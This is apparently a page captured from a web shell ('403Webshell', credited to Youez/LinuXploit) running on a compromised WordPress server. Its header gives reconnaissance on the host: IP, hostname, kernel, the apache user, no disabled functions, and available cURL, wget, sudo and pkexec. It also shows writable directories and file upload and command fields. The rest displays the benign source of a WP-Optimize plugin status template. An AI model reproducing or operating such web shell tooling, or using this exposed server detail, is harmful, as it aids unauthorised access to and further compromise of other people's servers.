403Webshell
Server IP : 178.212.43.201  /  Your IP : 10.100.0.33
Web Server : Apache/2.4.37 (Oracle Linux Server) OpenSSL/1.1.1k
System : Linux spa0007.srv.paxillus.pl 5.4.17-2136.355.3.1.el8uek.x86_64 #3 SMP Sat May 9 17:11:55 PDT 2026 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/paxillus/wp-content/plugins/wp-optimize-premium/templates/status/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/paxillus/wp-content/plugins/wp-optimize-premium/templates/status/status-page-ajax.php
<?php if (!defined('WPO_VERSION')) die('No direct access allowed');

?>
<div class="notice notice-warning">
	<p><?php esc_html_e('You can download and attach this system status information to your ticket when contacting support', 'wp-optimize'); ?></p>
	<p>
		<button id="wpo-show-status-report-btn" class="button-secondary"><?php esc_html_e('Show', 'wp-optimize'); ?></button>
		<button id="wpo-copy-status-report-btn" class="button-secondary"><?php esc_html_e('Copy', 'wp-optimize'); ?></button>
		<button id="wpo-download-status-report-btn" class="button-secondary"><?php esc_html_e('Download report', 'wp-optimize'); ?></button><div id="wpo-copy-action-result"></div>
	</p>
	<div id="report_container"></div>
</div>
<div id="wpo-server-info">
<?php
$markdown_report = '';
foreach ($report_data as $block) :
	$main_title = $block['title'];
	$markdown_report .= "### $main_title ###\n\n";
?>
	<h2><?php echo esc_html($main_title); ?></h2>
	<table class="wp-list-table widefat fixed striped table-view-list wp-optimize_page_wpo_settings">
	<?php
	foreach ($block['items'] as $info) :
		$title = wp_strip_all_tags($info['title']);
		$value = $info['value'];
		$markdown_value = isset($info['markdown_value']) ? $info['markdown_value'] : $value;
		?>
		<tr>
			<td><?php echo esc_html($title); ?></td>
			<td><?php echo $value; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Output already escaped ?></td>
		</tr>
	<?php
		$markdown_report .= $title . ': ' . esc_html(wp_strip_all_tags($markdown_value)) . "\n";
	endforeach;
	$markdown_report .= "\n";
	?>
	</table>
<?php
endforeach;

?>
	<textarea name="server_info_report" id="wpo-server-info-report" cols="30" rows="10"><?php
	echo $markdown_report; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Output already escaped
?></textarea>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit